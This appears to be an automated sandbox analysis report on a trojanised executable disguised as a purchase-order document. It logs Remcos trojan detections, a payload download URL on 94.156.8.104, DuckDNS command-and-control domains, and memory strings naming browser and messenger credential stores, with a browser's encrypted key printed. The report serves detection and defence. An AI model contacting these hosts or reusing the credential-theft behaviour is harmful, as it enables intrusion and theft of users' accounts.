              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe", ParentImage: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, ParentProcessId: 7048, ParentProcessName: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" , ProcessId: 2224, ProcessName: wscript.exe
              Timestamp:04/26/24-09:42:02.921686
              SID:2032776
              Source Port:50301
              Destination Port:3980
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/26/24-09:46:14.616756
              SID:2032777
              Source Port:3980
              Destination Port:50301
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: C:\Users\user\AppData\Local\Temp\weltervgter\Gutte.exeReversingLabs: Detection: 13%
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeVirustotal: Detection: 19%Perma Link
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeReversingLabs: Detection: 13%
              Source: Yara matchFile source: 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe PID: 7048, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kajsoiestc.dat, type: DROPPED
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,137_2_00404423
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 5_2_00405454 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_00405454
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 5_2_00405E7B FindFirstFileA,FindClose,5_2_00405E7B
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0040AE51 FindFirstFileW,FindNextFileW,137_2_0040AE51
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,138_2_00407EF8
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,139_2_00407898
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\udskriftskartotek\chiromancy\refalling\Pneumonolith.uplJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmpJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile opened: C:\Users\user\AppDataJump to behavior

              Networking

              barindex
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.11.20:50301 -> 172.94.9.228:3980
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 172.94.9.228:3980 -> 192.168.11.20:50301
              Source: unknownDNS query: name: janbours92harbu02.duckdns.org
              Source: unknownDNS query: name: janbours92harbu01.duckdns.org
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
              Source: global trafficHTTP traffic detected: GET /yhHZZNqAePDSUakAFmHWn151.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 94.156.8.104Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
              Source: global trafficHTTP traffic detected: GET /yhHZZNqAePDSUakAFmHWn151.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 94.156.8.104Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238940466.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56262170536.0000000002360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_o
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56262170536.0000000002360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_o
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56264578557.0000000002362000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56264732964.0000000002362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}HH equals www.facebook.com (Facebook)
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56262827718.0000000002360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: e","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}]
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56262827718.0000000002360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: e","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}]
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238940466.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56268106248.0000000002354000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56266296829.000000000234C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56268106248.0000000002354000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56266296829.000000000234C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56262328116.0000000002355000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: undationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"}hardware_acceleration_mode_previoustrueis_dsp_recommendedtruelegacy{"profile":{"name":{"migrated":true}}}migration{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false}network_primary_browser{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}}network_time{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}}os_crypt{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="}policy{"last_statistics_update":"13335737596278882"}profile{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20","background_apps":false,"edge_account_cid":"8628dc546dc99
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: janbours92harbu01.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: janbours92harbu02.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.59075843834.0000000005DC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.8.104/yhHZZNqAePDSUakAFmHWn151.bin
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crt0
              Source: bhvAF21.tmp.137.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
